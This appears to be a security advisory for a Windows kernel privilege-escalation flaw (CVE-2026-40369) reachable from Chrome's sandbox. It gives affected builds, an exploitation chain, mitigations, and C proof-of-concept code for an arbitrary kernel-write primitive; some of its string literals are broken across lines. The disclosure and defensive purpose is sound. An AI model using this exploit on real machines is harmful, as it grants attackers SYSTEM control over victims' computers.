Windows Kernel LPE (CVE‑2026‑40369) PoC: Privilege Escalation from Chrome Sandbox

CVE‑2026‑40369 is a Windows kernel vulnerability in ntoskrnl.exe that allows an attacker with low‑privilege local execution—such as a process confined to Chrome’s sandbox—to write arbitrary kernel‑address dwords.

Affected Versions

The flaw impacts all Windows 11 editions and Windows Server 2025 that have not installed the May 12 2026 security update:

Windows 11 24H2 (Build < 10.0.26100.8457)

Windows 11 25H2 (Build < 10.0.26200.8457)

Windows 11 26H1 (Build < 10.0.28000.2113)

Windows Server 2025 (Build < 10.0.26100.32860)

Technical Mechanism

The exploit relies on two kernel primitives:

ProbeForWrite bypass when the Length argument passed to a system call is zero. In that case the kernel skips the address validation performed by ProbeForWrite.

An arbitrary kernel‑address increment performed by NtQuerySystemInformation with information class 253 ( SystemProcessInformationExtension).

When class 253 is requested, the kernel invokes ExpGetProcessInformation. A simplified version of the loop is:

// ExpGetProcessInformation simplified logic
v95 = buffer; // attacker‑controlled kernel address (Length=0 bypass)
while (NextProcess) {
    if (infoClass == 253) {
        ++*v95;               // addr+0 += number of processes
        v95[1] += ...;        // addr+4 += total thread count
        v95[2] += ...;        // addr+8 += total handle count
    }
}

Because the buffer pointer is an attacker‑chosen kernel address, a single call writes three predictable dwords (process count, thread count, handle count) to consecutive locations. This provides a precise write primitive.

Chrome Sandbox Execution

The NtQuerySystemInformation syscall is not blocked by Chrome’s win32k lockdown, restricted token, or untrusted integrity level. Consequently, a renderer process that can execute native code can invoke the syscall directly and obtain SYSTEM privileges without any additional sandbox‑escape steps.

Exploitation Chain

Leak the kernel base address to defeat KASLR. The public PoC uses a prefetch‑tool module to obtain the ntoskrnl.exe base.

Locate the kernel Token object that stores the current process’s privilege bits.

Use the arbitrary increment primitive to modify the token’s privilege fields, setting them to SYSTEM.

Spawn a SYSTEM‑level cmd.exe to complete the privilege escalation.

The PoC triggers deterministically; it is not a “might work” demonstration.

Mitigation Recommendations

Method 1 – Windows Update (recommended): Enable Microsoft Update so the patch for CVE‑2026‑40369 is automatically downloaded and applied on the next reboot.

Method 2 – Manual installation: Download the appropriate update from the Microsoft security advisory page at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40369 and install it manually, then reboot.

Method 3 – Temporary mitigations: If immediate patching is not possible, restrict non‑admin users from running browser renderer processes, monitor anomalous NtQuerySystemInformation calls (especially class 253), and add detection rules to endpoint protection products. These measures only delay exploitation; the patch is the definitive fix.

Full PoC Example

The following C code, taken from the public GitHub repository orinimron123/CVE-2026-40369-EXPLOIT, demonstrates the core primitive – an arbitrary kernel‑address increment via NtQuerySystemInformation with Length=0:

#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")

typedef long NTSTATUS;
#define SystemProcessInformationExtension 253

typedef NTSTATUS (NTAPI *PNtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

int main(void)
{
    PNtQuerySystemInformation pNtQSI = (PNtQuerySystemInformation)
        GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtQuerySystemInformation");

    // Arbitrary kernel address (replace with a real target address)
    PVOID target = (PVOID)0xffff800041424344ULL;

    printf("[*] NtQuerySystemInformation class 253 arbitrary kernel increment PoC
");
    printf("[*] Target kernel address: %p
", target);
    printf("[*] Will write:
");
    printf("     [target+0] += num_processes (DWORD increment)
");
    printf("     [target+4] += total_threads (DWORD add)
");
    printf("     [target+8] += total_handles (DWORD add)

");
    printf("[!] This WILL bugcheck if the address is not mapped writable memory.
");
    printf("[*] Press Enter to trigger...
");
    getchar();

    ULONG needed = 0;
    NTSTATUS status = pNtQSI(
        SystemProcessInformationExtension,
        target,   // kernel address – Length=0 bypasses ProbeForWrite
        0,        // Length=0 is the bypass key
        &needed
    );

    printf("[*] NtQuerySystemInformation returned: 0x%08lX
", status);
    printf("[*] Required length: %lu
", needed);
    printf("[+] Done. If you see this, the writes succeeded without bugcheck.
");
    return 0;
}

Compile with: cl /W4 /O2 poc.c /Fe:poc.exe /link ntdll.lib The code illustrates the primitive; a full escalation also requires the KASLR leak and token manipulation steps described earlier.